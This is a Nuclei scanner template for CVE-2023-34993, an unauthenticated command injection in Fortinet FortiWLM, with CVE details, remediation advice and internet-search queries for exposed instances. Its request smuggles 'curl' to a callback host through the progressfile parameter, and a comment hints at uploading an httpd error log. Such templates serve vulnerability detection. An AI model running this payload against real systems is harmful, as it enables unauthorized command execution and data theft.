id: CVE-2023-34993

info:
  name: Fortinet FortiWLM Unauthenticated Command Injection Vulnerability
  author: dwisiswant0
  severity: critical
  description: |
    A improper neutralization of special elements used in an os command ('os
    command injection') in Fortinet FortiWLM version 8.6.0 through 8.6.5 and
    8.5.0 through 8.5.4 allows attacker to execute unauthorized code or commands
    Successful exploitation of this vulnerability could allow an attacker to
    bypass authentication and gain unauthorized access to the affected system.
  impact: |
    Unauthenticated attackers can exploit OS command injection to execute unauthorized commands on Fortinet FortiWLM systems, enabling complete system compromise and network infiltration.
  remediation: |
    For FortiWLM version 8.6.0 through 8.6.5 upgrade to version >= 8.6.6.
    For FortiWLM version 8.5.0 through 8.5.4 upgrade to version >= 8.5.5.
  reference:
    - https://fortiguard.com/psirt/FG-IR-23-140
    - https://www.horizon3.ai/attack-research/attack-blogs/fortiwlm-the-almost-story-for-the-forti-forty/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-34993
    cwe-id: CWE-78
    epss-score: 0.87679
    epss-percentile: 0.99483
    cpe: cpe:2.3:a:fortinet:fortiwlm:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: fortinet
    product: fortiwlm
    shodan-query:
      - http.title:"FortiWLM"
      - http.html:"fortiwlm"
      - http.title:"fortiwlm"
    fofa-query:
      - body="fortiwlm"
      - title="fortiwlm"
    google-query: intitle:"fortiwlm"
  tags: cve,cve2023,fortinet,fortiwlm,rce,unauth,vkev,vuln
variables:
  progressfile: '{{rand_base(5)}};curl {{interactsh-url}} #' # -F "file=/data/apps/nms/logs/httpd_error_log"

http:
  - method: GET
    path:
      - "{{BaseURL}}/ems/cgi-bin/ezrf_upgrade_images.cgi?op_type=deleteprogressfile&progressfile={{url_encode(progressfile)}}"

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"

      - type: word
        part: interactsh_request
        words:
          - "User-Agent: curl"
# digest: 4a0a00473045022100a5c5718fba28abac52cd68b77e6c62dd01e1f0fad734941a90684870045ead3d02204adff215bde6d3fd9eb15cb8b2c3332027b17458afd2bda5454582c6fb032ba6:922c64590222798bb761d5b6d8e72950